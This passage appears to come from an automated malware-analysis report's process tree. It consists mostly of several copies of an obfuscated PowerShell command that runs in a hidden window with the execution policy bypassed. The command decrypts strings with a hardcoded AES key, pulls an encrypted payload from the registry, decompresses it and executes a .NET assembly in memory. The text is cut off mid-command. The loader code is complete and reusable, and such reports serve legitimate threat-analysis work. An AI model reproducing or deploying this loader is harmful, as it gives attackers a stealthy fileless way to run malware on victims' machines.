[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        37⤵
        
        PID:7992
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        Hide Artifacts: Hidden Window
        
        PID:8340
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        Hide Artifacts: Hidden Window
        
        PID:2368
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:8592
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = 